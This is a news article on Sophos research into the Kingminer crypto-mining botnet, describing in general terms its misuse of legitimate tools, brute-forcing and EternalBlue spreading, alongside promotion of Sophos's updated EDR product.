A mixture of advanced techniques & copy-paste methods are being used by cyber-criminals, also combining with perfectly legitimate tools, research from Sophos about botnet ‘Kingminer’ reveals.
‘Kingminer’ botnet hackers are using valid tools e.g. Powershell, Wscript & Bitsadmi. This means that being able to question how legitimate tools are used & are interacting with one another is now a required defence technique against the attacks that are being patterned on misusing legitimate elements.
The State of Ransomware 2020 report from Sophos, explains that nearly a quarter of organisations breached by these attacks were actually able to detect the ransomware attack & stop it before it encrypted their data.
Paul Ducklin, Principal Research Scientist at Sophos on illicit Crypto-mining observed, “The Kingminer attackers aren’t really concerned with innovation but with adaptation, meaning that they take existing malicious techniques & tools and tweak them or combine them to blend in for as long as possible.
“Illicit Crypto-mining follows a simple underlying equation: the longer the criminals go unnoticed, the longer they mine, & thus the more money they make. Unlike a ransomware attack, which involves careful preparation followed by an assault you cannot fail to notice, criminal Crypto-mining is about being an unseen, electricity-eating parasite for as long as you can.”
The research from Sophos about the named botnet ‘Kingminer’ concludes:
- Cyber-criminals are now using a combination of sophisticated techniques & copy-paste tactics
- Attackers are relying increasingly on legal tools such as Powershell, Wscript & Bitsadmin to achieve their aims, & so being able to query how legitimate tools are used & interact with each other is a useful defence technique against the attacks that are built on abusing legitimate components
- ‘Kingminer’ shares many of the features of other advanced ransomware attacks. In the ‘State of Ransomware 2020’ report, nearly a quarter (24%) of organisations breached by these ransomware hacks were actually able to detect the ransomware assault & stop it before it was able to encrypt their files.
Sophos has also revealed an updated version of its ‘Endpoint Detection and Response‘ (EDR), which it calls ‘the most significant product upgrade ever done by Sophos.’
Sophos’ EDR now includes new ‘Live Discover and Response’ capabilities to quickly identify & then neutralise evasive threats & proactively maintain IT operations, also allowing organisations to search for previous & current indicators of compromise.
Ryan Miller, Chief Information Security Officer, Mission Search commented “Sophos EDR is a force multiplier that gives me the tools I need to do the job of an entire team without adding additional headcount.
“This new version drastically reduces the time it takes to detect and respond to incidents, saving me on average 4-5 hours every day. Easy to use SQL queries simplify the previously complex & time-intensive process of investigating suspicious activity & allow me to perform searches that are completely unique to my network.
“As the Chief Information Security Officer of a Joint Commission certified healthcare staffing firm, I am extremely sensitive to any time delays in receiving warnings related to suspicious activity that could be a precursor of a malicious attack designed to obtain sensitive data.”
Gabor Szappanos, Threat Research Director at Sophos explained that the world of cyber-criminals is a “heterogeneous mass” with many different capability & resourcing levels.
The proper understanding of these differing capabilities is highly important in devising new defensive techniques.
Szappanos has further warned that the operators of the ‘Kingminer’ botnet are both ambitious & capable, but they do not have ‘unlimited’ resources. They use any solution & concept that is ‘freely available’, from public domain tools, to the methods used by ‘Advanced Persistent Threat’ groups.
He further added “This is a classic example of a lower rung cyber-gang unit copying an APT- style attack; in this case, a Chinese APT attack method, & using it as a blueprint for ‘Kingminer’. Sophos has explained about how some cyber-criminals use other attacks as ‘blueprints’, & this is revealing evidence that the tendency continues, if not becoming even more persistent, because it is ‘cost-effective’ & well-proven.
“Many parts of the ‘Kingminer’ attack are orchestrated using legit or greyware applications & PowerShell scripts. For defenders, this is where application control & other EDR features that detect suspicious ‘Living off the Land’ activity, as well as AMSI detections, can play a huge role.”
Sophos also has now published new research, ‘An Insider View into the Increasingly Complex ‘Kingminer’ Botnet’, that reveals the use of servers in carrying out their attacks, & the importance of threat intelligence in tracing this type of activity.
A ‘Kingminer’ botnet attempts to get server access by ‘brute-forcing’ login credentials, uses the ‘EternalBlue’ exploit to spread the malware among other attack mechanisms, Sophos discovered.
Dan Schiappa, Chief Product Officer, Sophos said that cyber-criminals are ‘raising the stakes’, stopping at ‘nothing’ to capitalise on expanded attack surfaces as organisations increasingly move to the cloud & enable remote work-forces.
Schiappa cautioned “Servers & other endpoints are all too insufficiently protected, creating vulnerable entry points that are ripe for attackers to exploit.”